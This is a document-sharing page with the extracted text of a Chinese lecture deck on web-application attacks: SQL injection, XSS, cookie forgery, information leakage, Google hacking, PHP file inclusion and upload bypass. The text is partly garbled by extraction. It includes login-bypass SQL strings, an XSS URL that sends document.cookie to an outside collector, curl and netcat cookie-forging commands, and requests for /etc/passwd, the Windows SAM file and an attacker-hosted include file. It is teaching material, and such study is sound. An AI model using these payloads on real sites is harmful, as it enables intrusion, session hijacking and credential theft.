gggweb应用攻击技术

上传人:平*** 文档编号:46086519 上传时间:2018-06-22 格式:PPT 页数:69 大小:4.86MB
返回 下载 相关 举报
gggweb应用攻击技术_第1页
第1页 / 共69页
gggweb应用攻击技术_第2页
第2页 / 共69页
gggweb应用攻击技术_第3页
第3页 / 共69页
gggweb应用攻击技术_第4页
第4页 / 共69页
gggweb应用攻击技术_第5页
第5页 / 共69页
点击查看更多>>
资源描述

《gggweb应用攻击技术》由会员分享,可在线阅读,更多相关《gggweb应用攻击技术(69页珍藏版)》请在金锄头文库上搜索。

1、 目录录十大WEB应用安全漏洞 SQL注入 XSS跨站 表单绕过 Cookies欺骗 信息泄露 GoogleHacking访问控制错误 PHP特有漏洞攻击 变量滥用 文件包含 上传漏洞攻击 网页篡改、挂马 其他SQL注入(SQL injection) 跨站脚本攻击 恶意代码 已知弱点和错误配置 隐藏字段 后门和调试漏洞 参数篡改 更改cookie 输入信息控制 缓冲区溢出十大常见的WEB应用攻击SQL注入技术 概述就攻击技术本质而言,它利用的工具是SQL的语法,针对的是 应用程序开发者编程中的漏洞,当攻击者能操作数据,向应用 程序中插入一些SQL语句时,SQL Injection攻击就发生了。

2、实际上,SQL Injection攻击是存在于常见的多连接的应用程 序中的一种漏洞,攻击者通过在应用程序预先定义好的SQL语 句结尾加上额外的SQL语句元素,欺骗数据库服务器执行非授 权的任意查询,篡改和命令执行。 就风险而言,SQL Injection攻击也是位居前列,和缓冲区溢 出漏洞相比,其优势在于能够轻易的绕过防火墙直接访问数据 库,甚至能够获得数据库所在的服务器的系统权限。在Web应用漏洞中,SQL Injection 漏洞的风险要高过其他所 有的漏洞。安全 风险攻击特点攻击的广泛性:由于其利用的 是SQL语法,使得攻击普遍存在 ;攻击代码的多样性:由于各种 数据库软件及应用程序有其

3、自 身的特点,实际的攻击代码可 能不尽相同;影响范围数据库:MS-Sql Server、 Oracle、Mysql、DB2、 Informix等所有基于SQL语言 标准的数据库软件;应用程序:ASP、PHP,JSP、 CGI、CFM等所有应用程序;简单的SQL Injection攻击(1)假设的登录查询SELECT * FROM usersWHERE login = victor AND password = 123假设的ASP代码var sql = “SELECT * FROM users WHERE login = “ + formusr + “ AND password = “ + fo

4、rmpwd + “;简单的SQL Injection攻击(2)输入字符formusr = or 1=1 formpwd = anything实际的查询代码SELECT * FROM users WHERE username = or 1=1 AND password = anything -是结束符,后面变成注释,导致 此SQL语句恒成立,可以登陆后台SQL注入攻击过程演示(1)手动注入发现注入点发现产品展示的URL链接,提交单引号立即报错用经典的and 1=1测试返回正常,用and 1=2返回不正常, 存 在注入漏洞用经典的and 1=1测试返回正常,用and 1=2返回不正常, 存在注入漏

5、洞Select * from user where id=123 String id =request.getParameter(“id”); String sql = “SELECT * FROM user WHERE id = “ + id; 判断数据库类型根据入侵经验该系统的后台可能为ORACLE数据库Dual这个表是ORACLE数据库特有的, 看下它是否存在, 如果存在就说明数据库为ORACLE。提交:And 0windows.location(http:/windows.location(http:/););生成恶意URL诱骗用户点击CookieCookie收集脚本运行在收集脚本运行

6、在cookie.aspcookie.asphttp:/target/http:/target/index.asp?inputindex.asp?input=document.locatiodocument.locatio n n=http:/control/=http:/control/cookie.asp?+document.cookiecookie.asp?+document.cookie 国外收集xss的站利用跨站获取COOKIE跨站漏洞演示跨站攻击的危害窃取 Cookie 劫持帐户 执行 ActiveX 执行 Flash 内容 强迫您下载软件对硬盘和数据采取操作 XSS挂马SNS和We

7、b2.0网站的发展,让交互性更的更强。SQL注入减少,XSS将 慢慢抬头,利用方式也变多。表单绕过漏洞漏洞介绍在登陆表单可以使用一些特殊字符绕过对合法用户的认证体系 ,并且拥有合法用户的权限漏洞成因对用户输入的字符未做安全性检测,它属于特殊的SQL注入。问题代码(ASP+ORACLE)username=Request(“username“) userpassword=md5(replace(trim(request(“userpassword“),“ “,“)set set rsrs= =server.CreateObject(“adodb.recordsetserver.CreateObje

8、ct(“adodb.recordset“) “) sqlsql=“select * from =“select * from userbuserb where username=“密码输入:任何字符点击登陆,并提交,即可拥有管理员权限存在SQL注入之表单绕过的URLCookie欺骗漏洞漏洞介绍利用工具修改客户端的Cookie欺骗服务器端的WEB程序漏洞成因WEB程序使用明文CookieWEB程序仅仅使用Cookie进行身份验证文件型Cookie欺骗保存在硬盘上会话型Cookie欺骗保存在内存中文件型Cookie欺骗攻击 修改硬盘上保存的Cookie 使用IECookieView修改 直接发送C

9、ookie 直接使用curl发发送Cookie curl http:/target/index.php -b “admin=1“ -d “other_action=todo“会话型Cookie欺骗攻击 获取HTTP响应头 ,伪造Cookie 使用使用NetCatNetCat连连连连接目接目标标标标,获获获获取取HTTPHTTP响响应头应头应头应头 ,修改,修改CookieCookie字段字段 虚假代理,发送Cookie 使用使用NetCatNetCat监监监监听端口,听端口,发发发发送送CookieCookie到到浏览浏览浏览浏览 器,器,NC vv l NC vv l p 9090 修改co

10、okie值loginok为任意值,即可成功管理员信息泄漏漏洞漏洞介绍提交特殊的错误参数,WEB服务器返回特定的详细的敏感信息漏洞成因WEB程序对错误处理不严WEB服务器配置不当WEB开发和管理不当WEB应用威胁信息泄漏攻击(1)泄漏物理路径请求不存在文件猜解正确用户名输入错误用户名时,返回“该用户不存在”暴露数据库路径请求http:/192.168.148.128/09- 90dbapp/product.asp?tp=67暴露oracle数据库信息WEB应用威胁信息泄漏攻击(2)数据库连接的备份文件db.inc.bakGlobal.asa.bakConfig.asp.bakConn.asp.b

11、ak 代码备份文件.asp.bak.asp.1www.rarWeb.tar.gzbackup.sqlweb.config.bak常用目录名和文件名/admin/backup/manage/admin.asplogin.phpAdmin_login.jspGoogleHacking什么是GoogleHackingGoogle Hacking是一种利用搜索引擎获取web应用程序 弱点和敏感信息的手段。Google Hacking 是一种以合法的方式获取非法或未授 权信息的手段Google Hacking 是所有利用搜索引擎进行攻击的一个 典型基本搜索+ 把google可能忽略的字列如查询范围 -

12、把某个字忽略 同意词. 单一的通配符* 通配符,可代表多个字母“精确查询 高级搜索intext 把网页中的正文内容中的某个字符做为搜索条件 intitle 搜索网页标题中某个字符做为搜索条件 cache 搜索google里关于某些内容的缓存iletype 搜索指定类型的文件(重要参数)inurl 搜索我们指定的字符是否存在于URL中site 搜索指定的网站或者域名GoogleHacking实例.cn filetype:inc filetype:mdb inurl:databasefiletype:mdb “Standard Jet DB“该站已经被入侵,HYTOP.MDB 是个木马打包源代码后

13、的生成文件访问控制错误漏洞漏洞介绍敏感目录或者敏感文件权限设置不当导致被攻击者查看漏洞成因WEB程序权限设置不严格WEB程序服务器权限设置不当WEBWEB应用威胁应用威胁访问控制错误攻击访问控制错误攻击 上传程序无密码保护http:/target/upfile.asp 直接可以浏览 目录http:/target/admin/ 下载模块下载敏感信息http:/target/down.jsp?file=c:winntrepairsam 后台管理无密码保护且易猜测后台管理 地址 http:/target/adminhttp:/target/admin http:/target/managehttp:

14、/target/managePHP特有漏洞攻击变量滥用攻击标量没有初始化远程文件包含漏洞没有检验文件是否为本地文件变量滥用攻击问题代码自定义变量绕过验证提交http:/victim/test_1.php?auth=1远程文件包含漏洞问题代码请求敏感文件请求http:/target/test_2.php?filename=/etc/passwd远程执行命令生成远程文件attack.txt,运行为http:/hacker/attack.txt ,内容为请求 http:/target/test_2.php?filename=http:/attack/attack. txt问题代码 请求敏感文件 请请

15、求http:/target/test_2.php?filename=/etc/passwd 远程执行命令 生成远远程文件attack.txt,运行为为http:/hacker/attack.txt,内 容为为 请请求 http:/target/test_2.php?filename=http:/attack/attack.txt第三方WEB程序漏洞漏洞介绍网站使用了第三方web程序,且含有可被利用攻击的漏洞漏洞成因第三方WEB自身安全性第三方WEB程序来源的安全性WEB开发和管理不当安恒机密. | 60编辑器最大的隐患(ewebeditor,fckeditor)交互平台BBSBLOG管理后台phpMyAdminTomcat/WebLogic上传欺骗漏洞漏洞介绍利用上传信息,绕过上传文件安全控制漏洞成因对上传文件无安全过滤对上传文件安全控制不严上传欺骗漏洞常见绕过仅本地javascript安全控制检测文件格式类型var fileext=document.form1.UpFile.value.substring(doc ument.form1.UpFile.value.lastIndexOf(

展开阅读全文
相关资源
相关搜索

当前位置:首页 > 高等教育 > 大学课件

电脑版 |金锄头文库版权所有
经营许可证:蜀ICP备13022795号 | 川公网安备 51140202000112号